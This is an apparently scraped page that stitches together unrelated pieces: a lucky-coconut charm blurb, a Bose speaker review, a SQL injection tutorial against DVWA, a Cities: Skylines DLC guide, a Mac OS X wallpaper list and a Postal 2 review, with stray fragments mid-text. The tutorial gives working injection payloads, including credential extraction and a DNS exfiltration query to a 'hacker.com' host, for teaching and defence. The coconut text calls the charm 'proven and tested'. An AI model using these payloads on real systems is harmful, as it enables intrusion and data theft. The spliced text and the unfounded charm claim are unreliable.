Among the different kinds of coconuts which are used as lucky charms, the Laghu coconut is the tiniest and the smallest one. The Laghu Nariyal is equivalent to the size of a betel nut. The rare fact about the Laghu coconut is its small size. It has three eyes; they are actually three black dots.

It is believed that the Goddess Lakshmi, the goddess of wealth is present in those places where the Laghu Nariyal is kept. Generally it is found in all the sea shores. This Nariyal is also known as the Mini Puja Nariyal.

The Laghu Nariyal is proven and tested to be effective as a good luck charm. Due to the Laghu Nariyal you will enjoy the comforts and luxuries of life. Design

Although the Companion 5 was designed and manufactured a decade ago, it still looks stunning with amazing build quality. The system includes 2 satellite speakers mounted on stands, an Acoustimass subwoofer and a control pod.

The Acoustimass module is the heart of the system as you need to plug the satellite speakers, power cord, control pod and USB cable to this module. Besides, you can also find a bass knob on the back of the subwoofer. The placement is a little inconvenient because the module is hidden under my desk, it would be much easier if the bass setting is placed on the control pod.

As the system was introduced when wireless technology hadn’t been a mainstream, it could make your desk more cluttered with its wires. While the subwoofer is hidden under my desk, the satellite speakers and control pod always stay in front of me and all of them have wires. If you hate cord clutter, you might not be interested in the speaker system. The system is quite heavy and bulky as well, especially the Acoustimass module. The whole system weighs over 17 lbs.

The control pod is a very helpful piece, it includes a soft-touch rotational volume control and a single-touch mute on top. Besides, there are headphones and aux jack for your convenience, so you can plug your headphones or other audio sources like your DAP, smartphones or tablets into the pod.

Setting up the system is quite easy because you don’t need to install any driver. Just plug the USB cable into your computer and you are almost set. It works on both Windows and Mac OS, you will just need to change a few settings for the speaker to work properly. Open the Audio MIDI Setup, choose Bose Audio Output -> Output -> Configure Speakers -> Multichannel, then select 5.1 Surround.

Audio Quality

Bose boasts the TrueSpace surround digital processing circuitry which brings 5.1 surround sound to the 2.1 system. I didn’t expect much from the 5.1 surround sound simulation because it never could reproduce the effects of two rear speakers. The Companion 5 can’t deliver the same effects but it is still outstanding for some reasons. You can check out the sound testing video below.

The Companion 5’s satellite speakers have curved faces which are intended to spread the sound in multiple directions and create the surround effects. Although it couldn’t have a performance of a real 5.1 system, I still can see it helps deliver a much broader soundstage. The most amazing aspect of the sound is probably the rumble bass response. It is so impressive that when I watch movies, I feel like I’m sitting in the cinema. Notably, I set the bass compensation knob at below the middle level, therefore, I believe the low response could satisfy any bass lover. Actually, I heard some distortion when I cranked up the bass knob, but setting it at 1/3 or 1/4 is perfectly fine.

I heard many complaints about the speaker but we must remember that this is a speaker system for computer, it shouldn’t be compared to home theater systems. I really don’t see any other speaker can compete with Companion 5 on this market. Apart from the powerful bass response, you can also enjoy a mid-range presence and acceptable highs. I made a comparison between the Companion 5 and my Philips Fidelio HTL7180 and I could realize a huge difference, the Bose speaker produces a much more powerful and clearer sound, particularly at lows and mids. The sound is just perfect for watching movies but it could be a little tiring due to its huge bass response.

SQL Injection attacks are still a threat to current web applications, despite their long history. In this article, we discuss the most common SQL Injection attack techniques with concrete examples from DVWA (Damn Vulnerable Web Application).

1. What is SQL Injection?

SQL Injection is a technique that allows an adversary to insert arbitrary SQL commands in the queries that a web application makes to its database. It can work on vulnerable webpages and apps that use a backend database like MySQL, Oracle, and MSSQL.

A successful attack can lead to unauthorized access to sensitive information in the database or to modifying entries (add/delete/update), depending on the type of the affected database. It also may be possible to use SQL Injection to bypass authentication and authorization in the application, shut down, or even delete the entire database.

2. How do SQL Injection attacks work?

We will see some concrete examples of multiple techniques that can be used to exploit SQL Injection vulnerabilities in web applications.

The target application in our case will be Damn Vulnerable Web Application (DVWA), which contains multiple types of vulnerabilities (SQLi, XSS, LFI, etc) and it is an excellent testbed for learning web security.

The types of SQL Injection attacks that we’ll discuss are:

Error-based SQL Injection

One of the most common types of SQL Injection vulnerabilities, it is also quite easy to determine. It relies on feeding unexpected commands or invalid input, typically through a user interface, to cause the database server to reply with an error that may contain details about the target: structure, version, operating system, and even to return full query results.

In the example below, the webpage allows fetching the first and last name of the user for a given ID. By submitting 5 as input for the User ID, the application returns user details from the database.

The SQL query used by the application is:

SELECT first_name, last_nameFROM users WHERE user_id = '$id';

The server accepts the input from the user and returns the associated values, indicating that an attacker can use malicious input to modify the backend query. Typing 5', the backend responds with an error due to the single quote:

The input from the user modifies the backend query, which becomes:

SELECT first_name,last_name FROM users WHERE user_id = '5'; (note the extra quote here)

Doing the same queries directly on the database server (just for testing purposes), the same results are visible:

Exploiting error-based SQL Injection relies on the fact that the injected SQL query will output the results into the error message returned by the database. For instance, by injecting the following payload into the User ID field:

0' AND (SELECT 0 FROM (SELECT count(*), CONCAT((SELECT @@version), 0x23, FLOOR(RAND(0)*2)) AS x FROM information_schema.columns GROUP BY x) y) - - '

will cause the application to return the following SQL error message (containing the value of the @@version variable):

Error: Duplicate entry '10.1.36-MariaDB#0'for key 'group_key'

The error is generated because GROUP BY requires unique group keys, which is intentionally not-unique to return the value of SELECT @@version in the error message.

UNION-based SQL Injection

The UNION operator extends the results returned by the original query, enabling users to run two or more statements if they have the same structure as the original one. We chose SELECT in our example; for the exploit to work, the following conditions are required:

Each SELECT statement within UNION has the same number of columns

The columns must also have similar data types

The columns in each SELECT statement are in the same order

SELECT first_name, last_name FROM users UNION SELECT username, password FROM login;

Here, first_name and last_name are the names of the columns in the table users, and username and password are the names of the columns in the table login.

Running a UNION operator with statements referring to different numbers of columns results in an error message, as with the following payload:

User ID: 1’ UNION SELECT 1;- -

However, the query is successful when it has the correct number of columns:

User ID: 1' UNION SELECT 1,2;- -

Trying it in the database renders the same output; an incorrect number shows an error and the right values completes the query successfully:

An attacker can test multiple variants until they hit the right one. Next, they can use this method to elicit information about the database version number with the help of the @@version command:

UNION SELECT 1,@@version;- -

Similarly, the command current_user() can extract the user type under whose privileges the database is running.

UNION SELECT 1,current_user();- -

Further exploiting the vulnerability, we can obtain the name of the tables in the current database along with the same details for the columns in the table that contain information.

To extract the list of tables, we can use:

1' UNION SELECT 1,table_name FROM information_schema.tables;- -

To get the column names, we can use:

1' UNION SELECT 1,column_name FROM information_schema.columns;- -

Using these two queries, we have extracted the table name users and column names userid, first_name, last_name, user, avatar, last_login, password, and failed_login. Now using the query below we can get the usernames and passwords of application users from the database:

1' UNION SELECT 1,concat(user,':',password) FROM users;- -

Most likely, the password is not stored in plain text but in hashed form (MD5 in our case). However, an attacker can try cracking it using rainbow tables, which match plain text strings with their hash representation.

Blind SQL Injection

This type of injection attack does not show any error message, hence “blind” in its name. It is more difficult to exploit as it returns information when the application is given SQL payloads that return a true or false response from the server. By observing the response, an attacker can extract sensitive information.

There are two types of blind SQL Injection: boolean-based and time-based.

Boolean-based Blind SQL Injection

In this type of attack, a Boolean query causes the application to give a different response for a valid or invalid result in the database. It works by enumerating the characters from the text that needs to be extracted (ex. database name, table name, column name, etc) one by one.

Using the same vulnerable application as before, instead of receiving user details for the provided User ID, the reply shows if the ID is present in the database or not.

As you can see in the image above, we get the message “User ID exists in the database” for values 1-5, while an ID value larger than 5 gets “User ID is MISSING from the database”.

We can try a Boolean-based payload to check if the application is vulnerable. Injecting the payload 1' and 1=1;- - results in a true condition because 1 is a valid ID and the '1=1' is a TRUE statement. So the result returned informs that the ID is present in the database.

Alternatively, feeding the payload 1' and 1=2;-- results in a false condition because 1 is a valid user ID and 1=2 is false; thus, we’re informed that the user ID does not exist in the database.

The scenario above indicates that a blind SQL Injection attack is possible. Moving forward with identifying the number of columns, we use the following payload:

1' and 1=1 UNION SELECT 1;- -

The query fails because there are two columns in the table. But when adjusted correctly, the condition becomes true and the message validates the query.

1' and 1=1 UNION SELECT 1,2;- -

The same method can be used to discover the version of the database. We get the first number of the database version with:

1' and substring(@@version,1,1)=1;- -

The reply is positive because ‘1’ is a valid entry in the database and it is also the first character/number of database version (@@version,1,1). For the second character, we use the following command:

1' and substring(@@version,2,1)=1;- -

Since the second character of the database version is not 1, there’s a negative result. Asking for a ‘zero’ as the second character in the database version, the message is positive (version number is “10”).

1' and substring(@@version,2,1)=0;- -

The next step is to learn the name of the database, which starts by determining the length of the name and then enumerating the characters in the correct order until the right string is hit.

We use the following payloads to determine how long is the name:

1’ and length(database())=1;-- 1’ and length(database())=2;- - 1’ and length(database())=3;- - 1’ and length(database())=4;- -

In our case, we received errors for the first three attempts and hit the right value on the fourth. This means that the name of the database is four characters long.

To enumerate the characters in the name of the database, we use these payloads:

1' and substring(database(),1,1)='a';- - 1' and substring(database(),1,1)='b';- - 1' and substring(database(),1,1)='c';- -

None of the commands were correct because’ is the first letter in the name.

Moving towards identifying the second character, we use the command

1' and substring(database(),2,1)='v';- -

And for the third, we run:

1' and substring(database(),3,1)='w';--

While the fourth is discovered using:

In the end, the name of the database is “dvwa.”

Time-based Blind SQL Injection

This type of blind SQL Injection relies on waiting for a specific period before a vulnerable application responds to an attacker’s queries tailored with a time delay value. The success of the attack is based on the time taken by the application to deliver the response. To check the time-based blind SQL Injection we use this command:

1' AND sleep(10);- -

Because we forced a delayed response of 10 seconds, the reply comes when this period expires.

With the confirmation of the vulnerability, we can proceed to extract the database version number. We used a command that forces a reply after two seconds:

1' and if((select+@@version) like '10%',sleep(2),null);- -+

If the response comes in two seconds, it means that the version starts with “10.” The “like” string operator we used in the query is designed to make a character-by-character comparison.

Out-of-band SQL Injection

With this type of SQL Injection, the application shows the same response regardless of the user input and the database error. To retrieve the output, a different transport channel like HTTP requests or DNS resolution is used; note that the attacker needs to control said HTTP or DNS server.

Exfiltrating information about an MYSQL database, an attacker can use these queries:

Database version:

1’;select load_file(concat(',version(),'.hacker.coms.txt'));

Database name:

1’;select load_file(concat(',database(),'.hacker.coms.txt'));

The two commands above concatenate the output of version() or database() commands into the DNS resolutions query for the domain “hacker.com”.

The image below shows how the version and name of the database have been added to the DNS info for the malicious domain. The attacker that controls the server can read the information from the log files.

3. Mitigating SQL Injection

At the root of it, SQL Injection has two main causes:

Failure to validate input before constructing the query

User input is included in building dynamic queries

To mitigate the problem, developers can enforce input validation and resort to prepared statements in combination with other protection methods.

1. Validating user-supplied input

It is possible in two ways: whitelisting and blacklisting characters that are accepted or denied in the user input fields.

Creating a list of approved characters is an efficient method to defend against SQL Injection attacks. Once the whitelist is ready, the application should disallow all requests containing characters outside it.

Blacklisting is not a recommended way to protect against SQL Injection because it is highly prone to failure. It works as long as the developer can make sure that the user input fields accept no special characters, other than what’s required. The result should be escaping all characters that may prove harmful.

2. Prepared Statements

This can force queries at the front-end to be handled as the content of the parameter, not part of the SQL query itself. This means there is no way an attacker can modify the backend SQL query by inserting malicious input at the front-end of the application.

WAFs inspect traffic at the application level and can determine whether it’s bad or not. Cities: Skylines - After Dark

PC, Reviews Charles October 20, 2015 Add-on, after dark, cities:skylines, city management, Colossal Order, Paradox Interactive A fter Dark is the first expansion to Cities:Skylines. While it introduces the much awaited Day and Night cycle, it also brings with it new city planning options and buildings. In the case of the After Dark expansion for the surprise hit city simulator Cities: Skylines, Developer Colossal Order already gave away the game-changing day/night cycle in a free patch, which.

The newest DLC, Industries, just released for Colossal Order's genre gold standard Cities: Skylines, and to celebrate, the game and all of its DLC except for the new one just went on sale on Steam through Thursday, November 1.

And while you may be tempted to just buy the complete game-and-DLC bundle (a more than $150 value for about 56 bucks), and you'd get a fantastic experience out of so doing, maybe you don't quite want to go whole hog right out of the box.

Maybe, instead, you're looking to keep your purchases down to the cost of a fast-food meal, but you really want to make the money count. For that, here's your guide to every Skylines DLC, from “not worth it at any price” to “buy it even if it isn't on sale, it's that good.”

Special note: I'm not including minor packs that don't make major gameplay changes. Stuff like Content Creator packs and radio stations add nice flavor to the game, but to be bluntly honest, they're really not worth spending your own money on, not when so much of that stuff is available in the Steam Workshop for free. Never send a paid content-only DLC to do a mod's job, I say.

Must-have Cities: Skylines DLCs

After Dark

After Dark isn't a mandatory because of the day/night cycle (which came with the free patch that accompanied the expansion anyway). Nor is it a mandatory because of the leisure and tourist buildings (which you may end up not using at all).

No, what makes After Dark a must-have is the overhaul of city services that it brings.

The Bus Terminal is absolutely essential to creating a large, integrated public transportation system that can serve a large city. Much like in any other city in the real world, the ability for bus lines to seamlessly converge on a central point is what makes it actually useful to the citizenry.

After Dark also introduced cargo hubs, which provide massive boosts to the city's industrial economy, especially with the Industries DLC. Even if you're not a huge fan of those yellow blocks on the map where the dirty jobs of the city get done, having them be profitable means they're not just eating space to keep demand for labor up.

It also comes with the International Airport, and if you've had a city big enough to where air capacity has become a concern, you'll know exactly what a gem this building is in the lategame.

Throw in taxi service on the roads to relieve congestion, and you see why After Dark was a complete and essential expansion that offered something for everyone. This is generally $7.49 on sale and $14.99 at full price and is the first DLC on this list well worth shelling out the complete cost of admission for.

Get it if:

You want your roads to be more efficient and you want a way to generate additional revenue streams to provide variety to your city's economy through leisure and tourism.

Miss it if:

For some bizarre reason (seriously, this DLC is absolutely essential), trying to run bigger cities with inefficient road networks somehow appeals more than having major gameplay improvements.

Industries

As the game's promotional materials put it, “mind your business” with Industries, a DLC that manages to layer a resource- and production-management RTS on top of a city builder without losing the plot in either case.

This is the DLC that actually makes the natural resources on the map useful. It cannot be overstated just how much this utterly revolutionizes gameplay.

Cities Skylines After Dark Steam

Especially when combined with the menu setting that gives unlimited oil and ore resources rather than ones that deplete in about 10 minutes of gameplay, this is the DLC that turns industrial zones from earlygame stopgaps into true profit drivers of their own.

Even better, Colossal Order made the creation of these new-style industrial zones super easy for anyone who's played the base game, and double-especially for anyone who's played Parklife. They repurposed the existing system for drawing districts to let you build out the industrial zone exactly where and in what size you want it.

The system is not without its weaknesses, but they're awfully minor.

For one thing, there is still that great big “but what about your playstyle” question that looms over every single DLC, even the mandatories; if you're just not into having manufacturing cities and you're going to devote that real estate to building powerhouse office zones, there is nothing in Industries that demands you not do that, and there are still only so many citizens to go around in the labor pool.

For another, maybe you don't have $14.99 to burn, and this one's still brand-new so it's not getting its first sale until probably Christmas at the earliest.

But if the money won't break you, and you have any interest at all in stirring a little tycoon game peanut butter into your chocolate city builder, this is absolutely essential. Check out our review here.

Get it if:

You have any real interest in making your industrial zones into something special in terms of their value to your city's economy.

Miss it if:

Your playstyle just really, really doesn't swing toward industrial zones.

Mass Transit

Here we have the DLC that makes large cities possible and expands in every way upon the vanilla game's available tools to get cars off the road and, with another nod toward the developers' body of work, really gets your cities in motion.

From the fantastical (blimps!) to the more familiar (ferries, cable cars, and the monorail that put North Haverbrook on the map), and featuring intermodal transit hubs that let you build things like Boston's multi-transit South Station, this is the DLC that turns public transportation from a curiosity that lacks a bit in depth to a fully integrated system that gives your cities the ability to handle even Tokyo-sized traffic volumes.

There are even ropeways that can go up the sides of mountains and unlock the possibilities of spaces that used to be obstacles to development.

And it's on sale for $6.49, but the regular price of $12.99 is a bargain.

This does for Skylines what the Rush Hour pack did for SimCity 4 way back in the day. It takes a good-but-not-great part of the base game and just elevates it to levels that will make you seriously wonder how on earth you ever got along without it.

Cities: Skylines - After Dark

When combined with Industries and After Dark, this is the essential Cities: Skylines starter kit. The 30 bucks or so it will set you back to buy the rest of the major DLC is entirely optional, but if you haven't already looked at your wallet to see if you've got another 30 for Mass Transit, you should.

Get it if:

You have any sense in your head at all and want your public transportation to work the best that it can.

Miss it if:

You don't have the money. That's the only plausible reason.

Depends on your Playstyle

Parklife

I have mixed feelings about Parklife that showed themselves in my review of the DLC when it came out.

Specifically, building a great zoo or nature preserve or city park or Nuka-World is a great way to add a lot of visual flavor to your cities. Also, when it's done right, the park districts are a great revenue stream for the city, pulling a profit that you can then put into improving the rest of your civic infrastructure and whatnot to power a more prosperous city.

That's the real strength of Parklife: the game-within-a-game of creating the perfect park while simultaneously balancing all the other spinning plates that come with a well-balanced city.

The biggest weakness is that the park mechanics don't contribute enough to the city in terms of land value per unit cost to justify their existence unless you're building them as a profit driver. The already-existing parks-and-recreation system in the base game is better for your citizens on the whole if your sole goal is to grow your tax base, and as such there's an opportunity cost that comes in the box and wipes out a lot of the benefit.

Everything else in the DLC is in service of the parks system; there's nothing here for base game players to have any fun with the way, for example, Snowfall gave that neat-o tram system (even if it was the only thing in the DLC and largely rendered obsolete by Mass Transit—more on that later). The sightseeing buses and new reward buildings all tie back into the park system.

The DLC will run you $14.99, or $10.04 during the 33 percent off sale, and the only real way to recommend it is if you're the type of person for whom beautification and screenshot value is where you get the joy from your particular playstyle.

Get it if:

You want to create a unique look for your cities, or you enjoy having a more hands-on role in the creation of your leisure areas.

Miss it if:

You're more efficiency-oriented or don't want to add complexity to one of your city's systems without a meaningful tangible reward.

Green Cities

This one falls short of mandatory status thanks largely to the fact that it's not strictly necessary to use green building options in order to have a perfectly functional and relatively clean city. By the time you're in office-zone territory, that problem usually takes care of itself, or at worst cordons itself into “the bad part of town”.

But all the same, if you're playing the kind of playstyle where you want to create beautiful, ultra-modern, clean cities of the future, this scratches that itch in ideal fashion. For a utopian player, new building specializations, electric cars, green parks, and ability to apply eco-friendly policies to districts means there's a ton of great stuff here to be explored.

When you've got those geothermal power plants firing and the yoga gardens built, you can then gear your city toward getting the Ultimate Recycling Plant, one of the game's “monument” super-buildings, and that's the other strength of this DLC, the fact that the reward at the end is extremely useful.

The downside, as with most Skylines DLC, is that if your playstyle doesn't lean toward what the DLC is trying to offer, it's just a bunch of stuff you'll never use but that you paid $6.49 for on sale or $12.99 for at full price.

But this is where you're really starting to get into the “most playstyles can find a way to use this stuff” territory that makes DLC, especially on sale, a must-have.

Get it if:

Reducing pollution while still running an economically viable city appeals to you.

Miss it if:

You're less concerned with “green” city design and your playstyle doesn't super-prioritize reducing pollution beyond the simple maintenance levels you can achieve with basegame tools.

Don't Bother

Snowfall

Snowfall makes everything look pretty, and there is plenty to be said in favor of the challenge that adapting your city to wintry conditions offers.

Orwell: keeping an eye on you download. The problem is that this DLC is extremely poorly executed.

For one thing, the snowfall is an all-or-nothing affair. Either brace yourself and prepare for the frozen tundra of an icy waste like the northernmost parts of Colossal Order's home nation of Finland, or else use a map that isn't Snowfall-enabled and get absolutely no value out of the DLC at all.

Sure, existing maps get rain and fog, and the Streetcar system is a nice addition to the multitude of transit options we've come to expect from a studio that made its name on the old Cities In Motion series, but you'd really need money to be burning a hole in your pocket before you dropped even the $6.49 sale price on it.

Plus, as several Steam reviewers have pointed out, the complete lack of contrast inherent in having a city covered in snow takes away a lot of the visual appeal that the game's landscapes usually have. Snow is beautiful, as anyone who loves living in cold climates knows, but it's not visually interesting the way nature tends to be during the rest of the year. You'll grow tired of it quickly.

Get it if:

You really love winter wonderlands and you have money to burn.

Miss it if:

You'd rather just go out for a burger and fries; you're not missing anything by not having this DLC installed.

Natural Disasters

Northgard - svardilfari clan of the horse whisperer. Remember how in SimCity 4 (and its earlier brothers), half the fun of building a city was unleashing the wrath of Judgment Day upon it like some kind of cruel cross between the God of the Old Testament and Kefka from Final Fantasy VI?

This is the experience Natural Disasters is out to create, and if that's what floats your boat, then you'll get everything you ever wanted here.

The problem is twofold and why this DLC is just way too hard for me to recommend even for people who have a fetish for breaking stuff in a city-building game.

One, that's way too much of a one-note song even for $7.49, much less the $14.99 regular ask.

And two, as anyone who's played SimCity knows, breaking stuff is cathartic and all, but what do we all do when we get it out of our system?

We reload the save and play with the hope that the game won't break our stuff on its own volition, that's what.

And this DLC, even though it adds lovely early-warning systems and all kinds of major mechanical anti-frustration features for dealing with a disaster, is still going to throw a disaster at you unless you toggle the option off in the menu, at which point you just spent $7.49 for “I wanted to destroy something beautiful mode.”

Get it if:

You really love to destroy stuff and triggering disasters never got old for you in the old SimCity games.

Miss it if:

You'd rather build cities than destroy them.

Hopefully my experiences with Cities: Skylines and its DLCs and expansions will help you decide which you'd like to throw money at.

10.0 Cheetah & 10.1 Puma

The first two releases of Mac OS X shared the same wallpaper. The sweeping blue arcs and curves helped set the tone of the new Aqua interface.

10.2 Jaguar

Jaguar took the same Aqua-inspired theme but added some depth and motion to things. In my head, the trails streaking across the screen were from a set of comets.

10.3 Panther

While Panther inflicted Macs everywhere with Brushed Metal, its wallpaper stayed on brand, refreshing the original 10.0 image.

10.4 Tiger

Many consider Tiger to be the best “classic” version of Mac OS X. While that may or may not be true, it has my favorite Aqua-inspired wallpaper.

10.5 Leopard

Complete with a revised, unified user interface and shiny new Dock, 10.5 broke the Aqua mold. As such, Leopard was the first version of OS X to break from the Aqua-themed wallpaper. It ushered in the “space era” of OS X wallpapers, which was used heavily in the new Time Machine interface as well.

10.6 Snow Leopard

The “no new features” mantra for Snow Leopard didn’t ban a new wallpaper, thankfully. This starscape is still one of my favorites.

10.7 Lion

Lion kept up the space theme, this time showing off the Andromeda galaxy. The space nerd in me likes the idea, but the execution of this one leaves dead-last on my list of favorites.

10.8 Mountain Lion

Just like Snow Leopard before it, with Mountain Lion, Apple opted to clean up and revise the existing theme as opposed to changing directions for what would be a less-impactful release of OS X.

10.9 Mavericks

Mavericks marked the beginning of Apple’s “California location” naming scheme for Mac releases. The wave depicted looks as intimidating as the ones in the famous surfing location.

10.10 Yosemite

Yosemite brought another UI refresh to the Mac, making things flatter and more modern. The wallpaper ushered in a new era based on … well … mountains.

10.11 El Capitan

Named after a breathtaking spot in Yosemite National Park, El Capitan was a clean-up year after 10.10.

10.13 High Sierra

Even more mountains.

10.14 Mojave

No more mountains! Mojave brought a new system-wide Dark Mode, and the OS shipped with two versions of its default wallpaper to match. Users could even have macOS slowly fade between the two background images over the course of the day.

Postal 2: Paradise Lost is unabashedly loud, violent, and offensive, which surprisingly works from time to time. As an expansion to an FPS with one of the biggest cult followings around, Paradise Lost adds more of what fans what to see. There's wackier objectives, more ridiculous weapons, and a continuous spew of racy jokes and touchy topics.

Postal 2 is one of the most controversial games that has ever been made, mostly due to its explicit violence. People don’t mind if computer games have hundreds of Orks burnt alive, but when you give a flame thrower to a character and allow him to walk the streets, then people kick up a fuss.

The Obvious But Flawed Comparison To GTA

If you have never played or seen Postal 2, then you may think that running around shooting people and burning them is just like one of the later GTA games, but you are very wrong. For example, you could throw a petrol bomb into a crowd and watch them burn and scream. You will then see the scarred and burnt survivors try to crawl away in pain. It is just not the sort of thing you will see in other games.

It’s Raining Fiery Cats

The aim of the game is to get through seven days worth of chores. Every day you have a different set of things to do, and they are all innocent. For example, on the first day you have to pick up milk. You can walk into the shop, wait in the queue, and buy the milk. Or, you can whip out a machine gun, mow down the people in the queue, fight the Korean shop owner with has a shotgun, and take the milk from the shelf. Once you complete the last day of chores, hell breaks loose and it starts raining cats.

The Comedy And Social Commentary Is Clever

If you are a little older, there are quite a few jokes you can appreciate. For example, when you vote, the paper is askew so you cannot really see whom you are voting for. There are terrorists hiding in the caves, and there is a gun that allows you to shoot cats. The local butcher serves human meat, and when you try to get people to sign a petition, they tell you to go away with curse words. One of the bosses has the outline of male genitalia, there is an anti-gaming rally outside the developer of the games office, and one of the movies listed on the movie board for the cinema is “Sperms of Endearment.”

Governments Have Banned This Game

This game doesn’t encourage people to harm others; it is just a way of getting involved with a little mindless violence in a familiar setting. It is a form of fantasy fulfilment, especially when you find people that look like your boss or the guy that bullied you in school. Due to its violent nature, you will not see any kids in this game, but you also see very little sexually explicit content, just a few sexy ladies and guys here and there.
